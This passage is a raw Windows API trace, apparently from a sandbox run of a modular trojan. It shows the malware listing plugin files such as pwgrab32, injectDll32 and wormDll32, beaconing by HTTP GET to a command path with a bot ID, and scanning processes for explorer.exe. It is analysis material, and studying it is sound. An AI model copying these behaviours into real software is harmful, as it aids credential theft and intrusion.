	[0244.145] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x2488f8
	[0244.145] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x234f30
	[0244.145] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5b9e6500, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5ceba580, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ceba580, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32_configs", cAlternateFileName="INJECT~2")) returned 1
	[0244.145] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68a088a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x68a088a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x68a088a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x4ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32", cAlternateFileName="NETWOR~1")) returned 1
	[0244.145] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2488f8, Size=0x10) returned 0x248910
	[0244.145] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22b6298
	[0244.145] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x69f02a80, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32_configs", cAlternateFileName="NETWOR~2")) returned 1
	[0244.145] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e5ad7a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6e5ad7a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6e5d3900, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x48b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32", cAlternateFileName="")) returned 1
	[0244.145] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248910, Size=0x10) returned 0x2488f8
	[0244.145] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22caa30
	[0244.145] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6eff1680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6eff1680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6eff1680, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32_configs", cAlternateFileName="PSFIN3~1")) returned 1
	[0244.145] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5edac380, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5edac380, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ee1e7a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x111360, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32", cAlternateFileName="")) returned 1
	[0244.145] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2488f8, Size=0x10) returned 0x248910
	[0244.145] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2738590
	[0244.145] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60507b60, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32_configs", cAlternateFileName="PWGRAB~1")) returned 1
	[0244.145] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70f7ba00, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70f7ba00, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x28e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="shareDll32", cAlternateFileName="SHARED~1")) returned 1
	[0244.145] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248910, Size=0x20) returned 0x27bfa18
	[0244.145] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x24a3b8
	[0244.145] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 1
	[0244.145] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27bfa18, Size=0x20) returned 0x27bfea0
	[0244.145] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x271f00
	[0244.145] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 1
	[0244.145] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27bfea0, Size=0x20) returned 0x27bfa18
	[0244.145] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26e438
	[0244.145] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 0
	[0244.145] GetLastError () returned 0x12
	[0244.145] FindClose (in: hFindFile=0x22b7080 | out: hFindFile=0x22b7080) returned 1
	[0244.145] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32") returned="injectDll32"
	[0244.145] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0244.145] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0244.145] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec
	[0244.146] GetFileTime (in: hFile=0x6ec, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x599517e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.146] CloseHandle (hObject=0x6ec) returned 1
	[0244.146] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x79397f00, dwHighDateTime=0x1d50a6a)) 
	[0244.146] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32") returned="networkDll32"
	[0244.146] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0244.146] GetFullPathNameW (in: lpFileName="Data\\networkDll32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32", lpFilePart=0x0) returned 0x42
	[0244.146] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec
	[0244.146] GetFileTime (in: hFile=0x6ec, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.146] CloseHandle (hObject=0x6ec) returned 1
	[0244.146] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x79397f00, dwHighDateTime=0x1d50a6a)) 
	[0244.146] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32") returned="psfin32"
	[0244.146] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0244.146] GetFullPathNameW (in: lpFileName="Data\\psfin32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32", lpFilePart=0x0) returned 0x3d
	[0244.146] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec
	[0244.146] GetFileTime (in: hFile=0x6ec, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x6e5d3900, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.147] CloseHandle (hObject=0x6ec) returned 1
	[0244.147] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x79397f00, dwHighDateTime=0x1d50a6a)) 
	[0244.147] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32") returned="pwgrab32"
	[0244.147] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0244.147] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
	[0244.147] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec
	[0244.147] GetFileTime (in: hFile=0x6ec, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x5ee1e7a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.147] CloseHandle (hObject=0x6ec) returned 1
	[0244.147] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x79397f00, dwHighDateTime=0x1d50a6a)) 
	[0244.147] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32") returned="shareDll32"
	[0244.147] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0244.147] GetFullPathNameW (in: lpFileName="Data\\shareDll32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32", lpFilePart=0x0) returned 0x40
	[0244.147] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\sharedll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec
	[0244.147] GetFileTime (in: hFile=0x6ec, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x70fa1b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.147] CloseHandle (hObject=0x6ec) returned 1
	[0244.148] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x79397f00, dwHighDateTime=0x1d50a6a)) 
	[0244.148] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32") returned="systeminfo32"
	[0244.148] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0244.148] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0244.148] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec
	[0244.148] GetFileTime (in: hFile=0x6ec, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x46215b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.148] CloseHandle (hObject=0x6ec) returned 1
	[0244.148] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x79397f00, dwHighDateTime=0x1d50a6a)) 
	[0244.148] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32") returned="wormDll32"
	[0244.148] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0244.148] GetFullPathNameW (in: lpFileName="Data\\wormDll32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32", lpFilePart=0x0) returned 0x3f
	[0244.148] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\wormdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec
	[0244.148] GetFileTime (in: hFile=0x6ec, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.148] CloseHandle (hObject=0x6ec) returned 1
	[0244.149] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x79397f00, dwHighDateTime=0x1d50a6a)) 
	[0244.149] WinHttpCloseHandle (hInternet=0x27e7968) returned 1
	[0244.149] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0244.149] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1/2Jg1Md0GbyGXpBSj6Pj3OhzJcyHXq/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7968
	[0244.149] WinHttpSetOption (hInternet=0x27e7968, dwOption=0x1f, lpBuffer=0x128bf0, dwBufferLength=0x4) returned 1
	[0244.149] WinHttpSendRequest (hRequest=0x27e7968, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0244.509] WinHttpReceiveResponse (hRequest=0x27e7968, lpReserved=0x0) returned 1
	[0244.509] WinHttpQueryHeaders (in: hRequest=0x27e7968, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128be0, lpdwBufferLength=0x128bdc, lpdwIndex=0x0 | out: lpBuffer=0x128be0*, lpdwBufferLength=0x128bdc*=0x4, lpdwIndex=0x0) returned 1
	[0244.509] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x3) returned 1
	[0244.509] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1468
	[0244.509] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x27e1468, dwNumberOfBytesToRead=0x3, lpdwNumberOfBytesRead=0x128bdc | out: lpBuffer=0x27e1468*, lpdwNumberOfBytesRead=0x128bdc*=0x3) returned 1
	[0244.509] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x0) returned 1
	[0244.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e1468, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3
	[0244.510] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e18a0
	[0244.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e1468, cbMultiByte=3, lpWideCharStr=0x27e18a0, cchWideChar=3 | out: lpWideCharStr="/1/") returned 3
	[0244.510] StrStrIW (lpFirst="/1/", lpSrch="/") returned="/1/"
	[0244.510] StrStrIW (lpFirst="1/", lpSrch="/") returned="/"
	[0244.510] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1810
	[0244.510] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1828
	[0244.510] lstrcpynW (in: lpString1=0x27e1828, lpString2="1/", iMaxLength=2 | out: lpString1="1") returned="1"
	[0244.510] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe58) returned 1
	[0244.510] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e18a0) returned 1
	[0244.510] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1810) returned 1
	[0244.510] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1468) returned 1
	[0244.510] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x66c
	[0244.513] Process32FirstW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0244.514] lstrcmpW (lpString1="explorer.exe", lpString2="[System Process]") returned 1
	[0244.514] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0244.515] lstrcmpW (lpString1="explorer.exe", lpString2="System") returned -1
	[0244.515] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0244.516] lstrcmpW (lpString1="explorer.exe", lpString2="smss.exe") returned -1
	[0244.516] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0244.517] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0244.517] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0244.518] lstrcmpW (lpString1="explorer.exe", lpString2="wininit.exe") returned -1
	[0244.518] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0244.519] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0244.519] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0244.520] lstrcmpW (lpString1="explorer.exe", lpString2="winlogon.exe") returned -1
	[0244.520] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0244.520] lstrcmpW (lpString1="explorer.exe", lpString2="services.exe") returned -1
	[0244.520] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0244.521] lstrcmpW (lpString1="explorer.exe", lpString2="lsass.exe") returned -1
	[0244.521] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0244.522] lstrcmpW (lpString1="explorer.exe", lpString2="lsm.exe") returned -1
	[0244.522] Process32NextW (in: hSnapshot=0x66c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.523] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
